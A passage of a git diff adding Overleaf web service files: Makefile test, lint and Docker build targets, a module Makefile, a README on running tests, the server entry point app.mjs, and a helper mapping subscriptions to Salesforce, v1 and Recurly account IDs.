development: use $ make test_frontend_ct +# +TEST_FRONTEND_CT_VARIANTS = \ + test_frontend_ct \ + test_frontend_ct_core_other \ + test_frontend_ct_core_features \ + test_frontend_ct_modules \ + test_frontend_ct_editor_other \ + test_frontend_ct_editor_visual \ + +# Note: The below cypress targets are for CI only +build_test_frontend_ct: + docker run --rm --volume /dev/shm:/dev/shm --user root $(IMAGE_CI) bash -ec 'tar -cC / overleaf | tar -xC /dev/shm' + +test_frontend_ct_core_other: export CYPRESS_RESULTS=./cypress/results/core +test_frontend_ct_core_other: export CYPRESS_SPEC_PATTERN=./test/frontend/**/*.spec.{js,jsx,ts,tsx} +test_frontend_ct_core_other: export CYPRESS_EXCLUDE_SPEC_PATTERN=./test/frontend/features/**/*.spec.{js,jsx,ts,tsx} + +test_frontend_ct_core_features: export CYPRESS_RESULTS=./cypress/results/core +test_frontend_ct_core_features: export CYPRESS_SPEC_PATTERN=./test/frontend/features/**/*.spec.{js,jsx,ts,tsx} +test_frontend_ct_core_features: export CYPRESS_EXCLUDE_SPEC_PATTERN=./test/frontend/features/source-editor/**/*.spec.{js,jsx,ts,tsx} + +test_frontend_ct_modules: export CYPRESS_RESULTS=./cypress/results/modules +test_frontend_ct_modules: export CYPRESS_SPEC_PATTERN=./modules/**/test/frontend/**/*.spec.{js,jsx,ts,tsx} + +test_frontend_ct_editor_other: export CYPRESS_RESULTS=./cypress/results/editor_other +test_frontend_ct_editor_other: export CYPRESS_SPEC_PATTERN=./test/frontend/features/source-editor/**/*.spec.{js,jsx,ts,tsx} +test_frontend_ct_editor_other: export CYPRESS_EXCLUDE_SPEC_PATTERN=./test/frontend/features/source-editor/components/codemirror-editor-visual*.spec.{js,jsx,ts,tsx} + +test_frontend_ct_editor_visual: export CYPRESS_RESULTS=./cypress/results/editor_visual +test_frontend_ct_editor_visual: export CYPRESS_SPEC_PATTERN=./test/frontend/features/source-editor/components/codemirror-editor-visual*.spec.{js,jsx,ts,tsx} + +$(TEST_FRONTEND_CT_VARIANTS): + COMPOSE_PROJECT_NAME=$@_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) run --rm test_frontend_ct + COMPOSE_PROJECT_NAME=$@_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down -v -t 0 + +# +# Acceptance tests +# + +test_acceptance: test_acceptance_app test_acceptance_modules +test_acceptance_saas: test_acceptance_app_saas test_acceptance_modules_merged_saas +test_acceptance_server_ce: test_acceptance_app_server_ce test_acceptance_modules_merged_server_ce +test_acceptance_server_pro: test_acceptance_app_server_pro test_acceptance_modules_merged_server_pro + +TEST_ACCEPTANCE_APP := \ + test_acceptance_app_saas \ + test_acceptance_app_server_ce \ + test_acceptance_app_server_pro \ + +test_acceptance_app: $(TEST_ACCEPTANCE_APP) +test_acceptance_app_saas: export COMPOSE_PROJECT_NAME=acceptance_test_saas_$(BUILD_DIR_NAME) +test_acceptance_app_saas: export OVERLEAF_CONFIG=$(CFG_SAAS) +test_acceptance_app_server_ce: export COMPOSE_PROJECT_NAME=acceptance_test_server_ce_$(BUILD_DIR_NAME) +test_acceptance_app_server_ce: export OVERLEAF_CONFIG=$(CFG_SERVER_CE) +test_acceptance_app_server_pro: export COMPOSE_PROJECT_NAME=acceptance_test_server_pro_$(BUILD_DIR_NAME) +test_acceptance_app_server_pro: export OVERLEAF_CONFIG=$(CFG_SERVER_PRO) + +$(TEST_ACCEPTANCE_APP): + $(DOCKER_COMPOSE) run --rm test_acceptance + $(DOCKER_COMPOSE) down -v -t 0 + +# We are using _make magic_ for turning these file-targets into calls to +# sub-Makefiles in the individual modules. +# These sub-Makefiles need to be kept in sync with the template, hence we +# add a dependency on each modules Makefile and cross-link that to the +# template at the very top of this file. +# Example: `web$ make modules/server-ce-scripts/test_acceptance_server_ce` +# Description: Run the acceptance tests of the server-ce-scripts module in an +# Overleaf Community Edition Environment. +# Break down: +# Target: modules/server-ce-scripts/test_acceptance_server_ce +# -> depends on modules/server-ce-scripts/Makefile +# -> add environment variable BASE_CONFIG=$(CFG_SERVER_CE) +# -> BASE_CONFIG=/overleaf/services/web/test/acceptance/config/settings.test.server-ce.js +# -> automatic target: `make -C server-ce-scripts test_acceptance_server_ce` +# -> automatic target: run `make test_acceptance_server_ce` in module +# Target: modules/server-ce-scripts/Makefile +# -> depends on Makefile.module +# -> automatic target: copies the file when changed +TEST_ACCEPTANCE_MODULES = $(MODULE_DIRS:=/test_acceptance) +$(TEST_ACCEPTANCE_MODULES): %/test_acceptance: %/Makefile +$(TEST_ACCEPTANCE_MODULES): modules/%/test_acceptance: + $(MAKE) test_acceptance_module MODULE_NAME=$* + +TEST_ACCEPTANCE_MODULES_SAAS = $(MODULE_DIRS:=/test_acceptance_saas) +$(TEST_ACCEPTANCE_MODULES_SAAS): %/test_acceptance_saas: %/Makefile +$(TEST_ACCEPTANCE_MODULES_SAAS): export BASE_CONFIG = $(CFG_SAAS) + +# This line adds `/test_acceptance_saas` suffix to all items in $(MODULE_DIRS). +TEST_ACCEPTANCE_MODULES_SERVER_CE = $(MODULE_DIRS:=/test_acceptance_server_ce) +# This line adds a dependency on the modules Makefile. +$(TEST_ACCEPTANCE_MODULES_SERVER_CE): %/test_acceptance_server_ce: %/Makefile +# This line adds the environment variable BASE_CONFIG=$(CFG_SERVER_CE) to all +# invocations of `web$ make modules/foo/test_acceptance_server_ce`. +$(TEST_ACCEPTANCE_MODULES_SERVER_CE): export BASE_CONFIG = $(CFG_SERVER_CE) + +TEST_ACCEPTANCE_MODULES_SERVER_PRO = $(MODULE_DIRS:=/test_acceptance_server_pro) +$(TEST_ACCEPTANCE_MODULES_SERVER_PRO): %/test_acceptance_server_pro: %/Makefile +$(TEST_ACCEPTANCE_MODULES_SERVER_PRO): export BASE_CONFIG = $(CFG_SERVER_PRO) + +CLEAN_TEST_ACCEPTANCE_MODULES = $(MODULE_DIRS:=/clean_test_acceptance) +$(CLEAN_TEST_ACCEPTANCE_MODULES): %/clean_test_acceptance: %/Makefile +clean_test_acceptance_modules: $(CLEAN_TEST_ACCEPTANCE_MODULES) +clean_ci: clean_test_acceptance_modules + +test_acceptance_module_noop: + @echo + @echo Module '$(MODULE_NAME)' does not run in ${LABEL}. + @echo + +TEST_ACCEPTANCE_MODULE_MAYBE_IN := \ + test_acceptance_module_maybe_in_saas \ + test_acceptance_module_maybe_in_server_ce \ + test_acceptance_module_maybe_in_server_pro \ + +test_acceptance_module: $(TEST_ACCEPTANCE_MODULE_MAYBE_IN) +test_acceptance_module_maybe_in_saas: export BASE_CONFIG=$(CFG_SAAS) +test_acceptance_module_maybe_in_server_ce: export BASE_CONFIG=$(CFG_SERVER_CE) +test_acceptance_module_maybe_in_server_pro: export BASE_CONFIG=$(CFG_SERVER_PRO) + +# We need to figure out whether the module is loaded in a given environment. +# This information is stored in the (base-)settings. +# We get the full list of modules and check for a matching module entry. +# Either the grep will find and emit the module, or exits with code 1, which +# we handle with a fallback to a noop make target. +# Run the node command in a docker compose container which provides the needed +# npm dependencies (from disk in dev-env or from the CI image in CI). +# Pick the test_unit service which is very light-weight -- the test_acceptance +# service would start mongo/redis. +$(TEST_ACCEPTANCE_MODULE_MAYBE_IN): test_acceptance_module_maybe_in_%: + $(MAKE) $(shell \ + OVERLEAF_CONFIG=$(BASE_CONFIG) \ + $(DOCKER_COMPOSE) run --rm test_unit \ + node test/acceptance/getModuleTargets test_acceptance_$* \ + | grep -e /$(MODULE_NAME)/ || echo test_acceptance_module_noop LABEL=$* \ + ) + +# See docs for test_acceptance_server_ce how this works. +test_acceptance_module_saas: export BASE_CONFIG = $(CFG_SAAS) +test_acceptance_module_saas: + $(MAKE) modules/$(MODULE_NAME)/test_acceptance_saas + +test_acceptance_module_server_ce: export BASE_CONFIG = $(CFG_SERVER_CE) +test_acceptance_module_server_ce: + $(MAKE) modules/$(MODULE_NAME)/test_acceptance_server_ce + +test_acceptance_module_server_pro: export BASE_CONFIG = $(CFG_SERVER_PRO) +test_acceptance_module_server_pro: + $(MAKE) modules/$(MODULE_NAME)/test_acceptance_server_pro + +# See docs for test_acceptance_server_ce how this works. +TEST_ACCEPTANCE_MODULES_MERGED_INNER = $(MODULE_DIRS:=/test_acceptance_merged_inner) +$(TEST_ACCEPTANCE_MODULES_MERGED_INNER): %/test_acceptance_merged_inner: %/Makefile +test_acceptance_modules_merged_inner: + $(MAKE) $(shell \ + OVERLEAF_CONFIG=$(BASE_CONFIG) \ + node test/acceptance/getModuleTargets test_acceptance_merged_inner \ + ) + +# inner loop for running saas tests in parallel +no_more_targets: + +# If we ever have more than 40 modules, we need to add _5 targets to all the places and have it START at 41. +test_acceptance_modules_merged_inner_1: export START=1 +test_acceptance_modules_merged_inner_2: export START=11 +test_acceptance_modules_merged_inner_3: export START=21 +test_acceptance_modules_merged_inner_4: export START=31 +TEST_ACCEPTANCE_MODULES_MERGED_INNER_SPLIT = \ + test_acceptance_modules_merged_inner_1 \ + test_acceptance_modules_merged_inner_2 \ + test_acceptance_modules_merged_inner_3 \ + test_acceptance_modules_merged_inner_4 \ + +# The node script prints one module per line. +# Using tail and head we skip over the first n=START entries and print the last 10. +# Finally we check with grep for any targets in a batch and print a fallback if none were found. +$(TEST_ACCEPTANCE_MODULES_MERGED_INNER_SPLIT): + $(MAKE) $(shell \ + OVERLEAF_CONFIG=$(BASE_CONFIG) \ + node test/acceptance/getModuleTargets test_acceptance_merged_inner \ + | tail -n+$(START) | head -n 10 \ + | grep -e . || echo no_more_targets \ + ) + +# See docs for test_acceptance_server_ce how this works. +test_acceptance_modules_merged_saas: export COMPOSE_PROJECT_NAME = \ + acceptance_test_modules_merged_saas_$(BUILD_DIR_NAME) +test_acceptance_modules_merged_saas: export BASE_CONFIG = $(CFG_SAAS) + +test_acceptance_modules_merged_server_ce: export COMPOSE_PROJECT_NAME = \ + acceptance_test_modules_merged_server_ce_$(BUILD_DIR_NAME) +test_acceptance_modules_merged_server_ce: export BASE_CONFIG = $(CFG_SERVER_CE) + +test_acceptance_modules_merged_server_pro: export COMPOSE_PROJECT_NAME = \ + acceptance_test_modules_merged_server_pro_$(BUILD_DIR_NAME) +test_acceptance_modules_merged_server_pro: export BASE_CONFIG = $(CFG_SERVER_PRO) + +# All these variants run the same command. +# Each target has a different set of environment defined above. +TEST_ACCEPTANCE_MODULES_MERGED_VARIANTS = \ + test_acceptance_modules_merged_saas \ + test_acceptance_modules_merged_server_ce \ + test_acceptance_modules_merged_server_pro \ + +$(TEST_ACCEPTANCE_MODULES_MERGED_VARIANTS): + $(DOCKER_COMPOSE) run --rm test_acceptance make test_acceptance_modules_merged_inner + $(DOCKER_COMPOSE) down -v -t 0 + +# outer loop for running saas tests in parallel +TEST_ACCEPTANCE_MODULES_MERGED_SPLIT_SAAS = \ + test_acceptance_modules_merged_saas_1 \ + test_acceptance_modules_merged_saas_2 \ + test_acceptance_modules_merged_saas_3 \ + test_acceptance_modules_merged_saas_4 \ + +test_acceptance_modules_merged_saas_1: export COMPOSE_PROJECT_NAME = \ + acceptance_test_modules_merged_saas_1_$(BUILD_DIR_NAME) +test_acceptance_modules_merged_saas_2: export COMPOSE_PROJECT_NAME = \ + acceptance_test_modules_merged_saas_2_$(BUILD_DIR_NAME) +test_acceptance_modules_merged_saas_3: export COMPOSE_PROJECT_NAME = \ + acceptance_test_modules_merged_saas_3_$(BUILD_DIR_NAME) +test_acceptance_modules_merged_saas_4: export COMPOSE_PROJECT_NAME = \ + acceptance_test_modules_merged_saas_4_$(BUILD_DIR_NAME) +$(TEST_ACCEPTANCE_MODULES_MERGED_SPLIT_SAAS): export BASE_CONFIG = $(CFG_SAAS) + +$(TEST_ACCEPTANCE_MODULES_MERGED_SPLIT_SAAS): test_acceptance_modules_merged_saas_%: + $(DOCKER_COMPOSE) run --rm test_acceptance make test_acceptance_modules_merged_inner_$* + $(DOCKER_COMPOSE) down -v -t 0 + +test_acceptance_modules: $(TEST_ACCEPTANCE_MODULES_MERGED_VARIANTS) + +# +# CI tests +# + +ci: + MOCHA_ARGS="--reporter tap" \ + $(MAKE) test + +# +# Lint & format +# +ORG_PATH = /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +RUN_LINT_FORMAT ?= \ + docker run --rm ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + +NODE_MODULES_PATH := ${PATH}:${PWD}/node_modules/.bin:/overleaf/services/web/node_modules/.bin +WITH_NODE_MODULES_PATH = \ + format_backend \ + format_frontend \ + format_misc \ + format_styles \ + format_test_app_unit \ + format_test_app_rest \ + format_test_modules \ + $(TEST_SUITES) \ + +$(WITH_NODE_MODULES_PATH): export PATH=$(NODE_MODULES_PATH) + +lint: lint_eslint +lint_eslint: + npm run lint + +lint: lint_stylelint +lint_stylelint: + npm run lint:styles + +lint: lint_pug +lint_pug: + bin/lint_pug_templates + +lint: lint_locales +lint_locales: + bin/lint_locales + +lint: check_extracted_translations +check_extracted_translations: + bin/check_extracted_translations + +sort_locales: + node scripts/translations/sort.js + +cleanup_unused_locales: + node scripts/translations/cleanupUnusedLocales.js + +lint: lint_flag_res_send_usage +lint_flag_res_send_usage: + bin/lint_flag_res_send_usage + +lint: lint_overleafModuleImports +lint_overleafModuleImports: + node scripts/check_overleafModuleImports.mjs + +lint: typecheck_frontend +typecheck_frontend: + npm run --silent type-check + +lint: typecheck_backend +typecheck_backend: + npm run --silent type-check:backend + +lint_in_docker: + $(RUN_LINT_FORMAT) make lint -j2 --output-sync + +format: format_js +format_js: + npm run --silent format + +format: format_styles +format_styles: + npm run --silent format:styles + +format_fix: + npm run --silent format:fix + +format_styles_fix: + npm run --silent format:styles:fix + +format_in_docker: + $(RUN_LINT_FORMAT) make format -j2 --output-sync + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(PWD):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(PWD):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +# +# Build & publish +# + +IMAGE_CI ?= ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) +IMAGE_REPO ?= us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME) +IMAGE_REPO_BRANCH ?= $(IMAGE_REPO):$(BRANCH_NAME) +IMAGE_REPO_MAIN ?= $(IMAGE_REPO):main +IMAGE_REPO_FINAL ?= $(IMAGE_REPO_BRANCH)-$(BUILD_NUMBER) + +export SENTRY_RELEASE ?= ${COMMIT_SHA} + +build_deps: + docker build --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --cache-from $(IMAGE_REPO_BRANCH)-deps \ + --cache-from $(IMAGE_REPO_MAIN)-deps \ + --tag $(IMAGE_REPO_BRANCH)-deps \ + --target deps \ + --file Dockerfile \ + ../.. + +build_dev: + docker build \ + --build-arg SENTRY_RELEASE \ + --tag $(IMAGE_CI) \ + --tag $(IMAGE_CI)-dev \ + --target dev \ + --file Dockerfile \ + ../.. + +build_webpack: + $(MAKE) build_webpack_once \ + || $(MAKE) build_webpack_once + +build_webpack_once: + docker build \ + --build-arg SENTRY_RELEASE \ + --cache-from $(IMAGE_CI)-dev \ + --cache-from $(IMAGE_CI)-webpack \ + --tag $(IMAGE_CI)-webpack \ + --target webpack \ + --file Dockerfile \ + ../.. + +build_pug: + docker build \ + --build-arg SENTRY_RELEASE \ + --cache-from $(IMAGE_CI)-dev \ + --tag $(IMAGE_CI)-pug \ + --target pug \ + --file Dockerfile \ + ../.. + +build: + docker build \ + --build-arg SENTRY_RELEASE \ + --cache-from $(IMAGE_CI)-webpack \ + --cache-from $(IMAGE_CI)-pug \ + --cache-from $(IMAGE_REPO_FINAL) \ + --tag $(IMAGE_REPO_FINAL) \ + --target app \ + --file Dockerfile \ + ../.. + +publish: + docker push $(IMAGE_REPO_FINAL) + +tar: + COMPOSE_PROJECT_NAME=tar_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) run --rm tar + COMPOSE_PROJECT_NAME=tar_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down -v -t 0 + +build_storybook: + npm run lezer-latex:generate + npm run build-storybook + if [ -n "$(BRANCH_NAME)" ]; then \ + echo "Renaming storybook-static -> $(BRANCH_NAME)."; \ + d=$$(dirname "$(BRANCH_NAME)"); \ + mkdir -p "storybook-output/$$d"; \ + mv storybook-static "storybook-output/$$d/$$(basename "$(BRANCH_NAME)")/"; \ + fi + +MODULE_TARGETS = \ + $(TEST_ACCEPTANCE_MODULES_SAAS) \ + $(TEST_ACCEPTANCE_MODULES_SERVER_CE) \ + $(TEST_ACCEPTANCE_MODULES_SERVER_PRO) \ + $(TEST_ACCEPTANCE_MODULES_MERGED_INNER) \ + $(CLEAN_TEST_ACCEPTANCE_MODULES) \ + $(TEST_UNIT_MODULES) \ + +$(MODULE_TARGETS): + $(MAKE) -C $(dir $@) $(notdir $@) BUILD_DIR_NAME=$(BUILD_DIR_NAME) + +.PHONY: + $(MODULE_TARGETS) \ + compile_modules compile_modules_full clean_ci \ + test test_module test_unit test_unit_app \ + test_unit_modules test_unit_module test_frontend \ + test_acceptance test_acceptance_app test_acceptance_modules \ + test_acceptance_module ci format format_fix lint \ + shellcheck shellcheck_fix \ + build publish tar diff --git a/services/web/Makefile.module b/services/web/Makefile.module new file mode 100644 index 0000000..6e1ce32 --- /dev/null +++ b/services/web/Makefile.module @@ -0,0 +1,66 @@ +BUILD_DIR_NAME ?= web +MODULE_NAME := $(notdir $(shell pwd)) +MODULE_DIR := modules/$(MODULE_NAME) +PROJECT_NAME = web + +export OVERLEAF_CONFIG = /overleaf/services/web/$(MODULE_DIR)/test/acceptance/config/settings.test.js +export BASE_CONFIG ?= /overleaf/services/web/test/acceptance/config/settings.test.saas.js + +CFG_SAAS=/overleaf/services/web/test/acceptance/config/settings.test.saas.js +CFG_SERVER_CE=/overleaf/services/web/test/acceptance/config/settings.test.server-ce.js +CFG_SERVER_PRO=/overleaf/services/web/test/acceptance/config/settings.test.server-pro.js + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := cd ../../ && \ + MODULE_DIR=$(MODULE_DIR) \ + BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +ifeq (,$(wildcard test/unit)) +test_unit: + +else +test_unit: export COMPOSE_PROJECT_NAME=unit_test_$(BUILD_DIR_NAME)_$(MODULE_NAME) +test_unit: + ${DOCKER_COMPOSE} run --rm test_unit npm -q run test:unit:run_dir -- ${MOCHA_ARGS} $(MODULE_DIR)/test/unit/src + ${DOCKER_COMPOSE} down + +endif + +ALL_TEST_ACCEPTANCE_VARIANTS := \ + test_acceptance \ + test_acceptance_saas \ + test_acceptance_server_ce \ + test_acceptance_server_pro \ + +ifeq (,$(wildcard test/acceptance)) +$(ALL_TEST_ACCEPTANCE_VARIANTS) test_acceptance_merged_inner: + @echo + @echo Module $(MODULE_NAME) does not have acceptance tests. + @echo + +clean_test_acceptance: + +else +test_acceptance_saas: export BASE_CONFIG = $(CFG_SAAS) +test_acceptance_server_ce: export BASE_CONFIG = $(CFG_SERVER_CE) +test_acceptance_server_pro: export BASE_CONFIG = $(CFG_SERVER_PRO) + +$(ALL_TEST_ACCEPTANCE_VARIANTS): export COMPOSE_PROJECT_NAME=acceptance_test_$(BUILD_DIR_NAME)_$(MODULE_NAME) +$(ALL_TEST_ACCEPTANCE_VARIANTS): + $(MAKE) --no-print-directory clean_test_acceptance + ${DOCKER_COMPOSE} run --rm test_acceptance npm -q run test:acceptance:run_dir -- ${MOCHA_ARGS} $(MODULE_DIR)/test/acceptance/src + $(MAKE) --no-print-directory clean_test_acceptance + +test_acceptance_merged_inner: + cd ../../ && \ + npm -q run test:acceptance:run_dir -- ${MOCHA_ARGS} $(MODULE_DIR)/test/acceptance/src + +clean_test_acceptance: export COMPOSE_PROJECT_NAME=acceptance_test_$(BUILD_DIR_NAME)_$(MODULE_NAME) +clean_test_acceptance: + ${DOCKER_COMPOSE} down -v -t 0 + +endif diff --git a/services/web/README.md b/services/web/README.md new file mode 100644 index 0000000..f82a55d --- /dev/null +++ b/services/web/README.md @@ -0,0 +1,130 @@ +overleaf/web +============== + +overleaf/web is the front-end web service of the open-source web-based collaborative LaTeX editor, +[Overleaf](https://www.overleaf.com). +It serves all the HTML pages, CSS and javascript to the client. overleaf/web also contains +a lot of logic around creating and editing projects, and account management. + + +The rest of the Overleaf stack, along with information about contributing can be found in the +[overleaf/overleaf](https://github.com/overleaf/overleaf) repository. + +### Running the app + +The app runs natively using npm and Node on the local system: + +``` +$ npm install +$ npm run start +``` + +### Running Tests + +To run all tests run: +``` +make test +``` + +To run both unit and acceptance tests for a module run: +``` +make test_module MODULE=saas-authentication +``` + +### Unit Tests + +The test suites run in Docker. + +Unit tests can be run in the `test_unit` container defined in `docker-compose.tests.yml`. + +The makefile contains a short cut to run these: + +``` +make test_unit +``` + +During development it is often useful to only run a subset of tests, which can be configured with arguments to the mocha CLI: + +``` +make test_unit MOCHA_GREP='AuthorizationManager' +``` + +To run only the unit tests for a single module do: +``` +make test_unit_module MODULE=saas-authentication +``` + +Module tests can also use a MOCHA_GREP argument: +``` +make test_unit_module MODULE=saas-authentication MOCHA_GREP=SSO +``` + +### Acceptance Tests + +Acceptance tests are run against a live service, which runs in the `acceptance_test` container defined in `docker-compose.tests.yml`. + +To run the tests out-of-the-box, the makefile defines: + +``` +make test_acceptance +``` + +However, during development it is often useful to leave the service running for rapid iteration on the acceptance tests. This can be done with: + +``` +make test_acceptance_app_start_service +make test_acceptance_app_run # Run as many times as needed during development +make test_acceptance_app_stop_service +``` + +`make test_acceptance` just runs these three commands in sequence and then runs `make test_acceptance_modules` which performs the tests for each module in the `modules` directory. (Note that there is not currently an equivalent to the `-start` / `-run` x _n_ / `-stop` series for modules.) + +During development it is often useful to only run a subset of tests, which can be configured with arguments to the mocha CLI: + +``` +make test_acceptance_run MOCHA_GREP='AuthorizationManager' +``` + +To run only the acceptance tests for a single module do: +``` +make test_acceptance_module MODULE=saas-authentication +``` + +Module tests can also use a MOCHA_GREP argument: +``` +make test_acceptance_module MODULE=saas-authentication MOCHA_GREP=SSO +``` + +Routes +------ + +Run `bin/routes` to print out all routes in the project. + + +License and Credits +------------------- + +This project is licensed under the [AGPLv3 license](http://www.gnu.org/licenses/agpl-3.0.html) + +### Stylesheets + +Overleaf is based on [Bootstrap](http://getbootstrap.com/), which is licensed under the +[MIT license](http://opensource.org/licenses/MIT). +All modifications (`*.less` files in `public/stylesheets`) are also licensed +under the MIT license. + +### Artwork + +#### Silk icon set 1.3 + +We gratefully acknowledge [Mark James](http://www.famfamfam.com/lab/icons/silk/) for +releasing his Silk icon set under the Creative Commons Attribution 2.5 license. Some +of these icons are used within Overleaf inside the `public/img/silk` and +`public/brand/icons` directories. + +#### IconShock icons + +We gratefully acknowledge [IconShock](http://www.iconshock.com) for use of the icons +in the `public/img/iconshock` directory found via +[findicons.com](http://findicons.com/icon/498089/height?id=526085#) + diff --git a/services/web/app.mjs b/services/web/app.mjs new file mode 100644 index 0000000..5ece02c --- /dev/null +++ b/services/web/app.mjs @@ -0,0 +1,110 @@ +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' + +import Modules from './app/src/infrastructure/Modules.js' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import PlansLocator from './app/src/Features/Subscription/PlansLocator.js' +import HistoryManager from './app/src/Features/History/HistoryManager.js' +import SiteAdminHandler from './app/src/infrastructure/SiteAdminHandler.js' +import http from 'node:http' +import https from 'node:https' +import * as Serializers from './app/src/infrastructure/LoggerSerializers.js' +import Server from './app/src/infrastructure/Server.mjs' +import QueueWorkers from './app/src/infrastructure/QueueWorkers.js' +import mongodb from './app/src/infrastructure/mongodb.js' +import mongoose from './app/src/infrastructure/Mongoose.js' +import { triggerGracefulShutdown } from './app/src/infrastructure/GracefulShutdown.js' +import FileWriter from './app/src/infrastructure/FileWriter.js' +import { fileURLToPath } from 'node:url' +import Features from './app/src/infrastructure/Features.js' + +logger.initialize(process.env.METRICS_APP_NAME || 'web') +logger.logger.serializers.user = Serializers.user +logger.logger.serializers.docs = Serializers.docs +logger.logger.serializers.files = Serializers.files +logger.logger.serializers.project = Serializers.project +http.globalAgent.keepAlive = false +http.globalAgent.maxSockets = Settings.limits.httpGlobalAgentMaxSockets +https.globalAgent.keepAlive = false +https.globalAgent.maxSockets = Settings.limits.httpsGlobalAgentMaxSockets + +metrics.memory.monitor(logger) +metrics.leaked_sockets.monitor(logger) +metrics.open_sockets.monitor() + +if (Settings.catchErrors) { + process.removeAllListeners('uncaughtException') + process.removeAllListeners('unhandledRejection') + process + .on('uncaughtException', error => + logger.error({ err: error }, 'uncaughtException') + ) + .on('unhandledRejection', (reason, p) => { + logger.error({ err: reason }, 'unhandledRejection at Promise', p) + }) +} + +// Create ./data/dumpFolder if needed +FileWriter.ensureDumpFolderExists() + +if ( + !Features.hasFeature('project-history-blobs') && + !Features.hasFeature('filestore') +) { + throw new Error( + 'invalid config: must enable either project-history-blobs (Settings.enableProjectHistoryBlobs=true) or enable filestore (Settings.disableFilestore=false)' + ) +} + +const port = Settings.port || Settings.internal.web.port || 3000 +const host = Settings.internal.web.host || '127.0.0.1' +if (process.argv[1] === fileURLToPath(import.meta.url)) { + // Called directly + // We want to make sure that we provided a password through the environment. + if (!process.env.WEB_API_USER || !process.env.WEB_API_PASSWORD) { + throw new Error('No API user and password provided') + } + + PlansLocator.ensurePlansAreSetupCorrectly() + + Promise.all([ + mongodb.connectionPromise, + mongoose.connectionPromise, + HistoryManager.promises.loadGlobalBlobs(), + ]) + .then(async () => { + Server.server.listen(port, host, function () { + logger.debug(`web starting up, listening on ${host}:${port}`) + logger.debug(`${http.globalAgent.maxSockets} sockets enabled`) + // wait until the process is ready before monitoring the event loop + metrics.event_loop.monitor(logger) + }) + QueueWorkers.start() + await Modules.start() + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) +} + +// initialise site admin tasks +Promise.all([ + mongodb.connectionPromise, + mongoose.connectionPromise, + HistoryManager.promises.loadGlobalBlobs(), +]) + .then(() => SiteAdminHandler.initialise()) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) + +// handle SIGTERM for graceful shutdown in kubernetes +process.on('SIGTERM', function (signal) { + triggerGracefulShutdown(Server.server, signal) +}) + +export default Server.server diff --git a/services/web/app/src/Features/Analytics/AccountMappingHelper.js b/services/web/app/src/Features/Analytics/AccountMappingHelper.js new file mode 100644 index 0000000..5967149 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AccountMappingHelper.js @@ -0,0 +1,97 @@ +const mappings = new Map([ + ['salesforce_id', generateSubscriptionToSalesforceMapping], + ['v1_id', generateSubscriptionToV1Mapping], + ['recurlySubscription_id', generateSubscriptionToRecurlyMapping], +]) + +/** + * @typedef {(import('./types.d.ts').AccountMapping)} AccountMapping + */ + +/** + * + * @param {Object} subscription + * @param {Object} updatedSubscription + * @return {Array<AccountMapping>} + */ +function extractAccountMappingsFromSubscription( + subscription, + updatedSubscription +) { + const accountMappings = [] + mappings.forEach((generateMapping, param) => { + if (updatedSubscription[param] || updatedSubscription[param] === '') { + if (subscription[param] !== updatedSubscription[param]) { + accountMappings.push( + generateMapping(subscription.id, updatedSubscription[param]) + ) + } + } + }) + return accountMappings +} + +function generateV1Mapping(v1Id, salesforceId, createdAt) { + return { + source: 'salesforce', + sourceEntity: 'account', + sourceEntityId: salesforceId, + target: 'v1', + targetEntity: 'university', + targetEntityId: v1Id, + createdAt, + } +} + +function generateSubscriptionToV1Mapping(subscriptionId, v1Id) { + return { + source: 'v1', + sourceEntity: 'university', + sourceEntityId: v1Id, + target: 'v2', + targetEntity: 'subscription', + targetEntityId: subscriptionId, + createdAt: new Date().toISOString(), + } +} + +function generateSubscriptionToSalesforceMapping(subscriptionId, salesforceId) { + return { + source: 'salesforce', + sourceEntity: 'account', + sourceEntityId: salesforceId, + target: 'v2', + targetEntity: 'subscription', + targetEntityId: subscriptionId, + createdAt: new Date().toISOString(), + } +} + +/** + * + * @param {string} subscriptionId + * @param {string} recurlyId + * @param {string} [createdAt] - Should be an ISO date + * @return {AccountMapping} + */ +function generateSubscriptionToRecurlyMapping( + subscriptionId, + recurlyId, + createdAt = new Date().toISOString() +) { + return { + source: 'recurly', + sourceEntity: 'subscription', + sourceEntityId: recurlyId, + target: 'v2', + targetEntity: 'subscription', + targetEntityId: subscriptionId, + createdAt, + } +} + +module.exports = { + extractAccountMappingsFromSubscription, + generateV1Mapping, + generateSubscriptionToRecurlyMapping, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsController.mjs 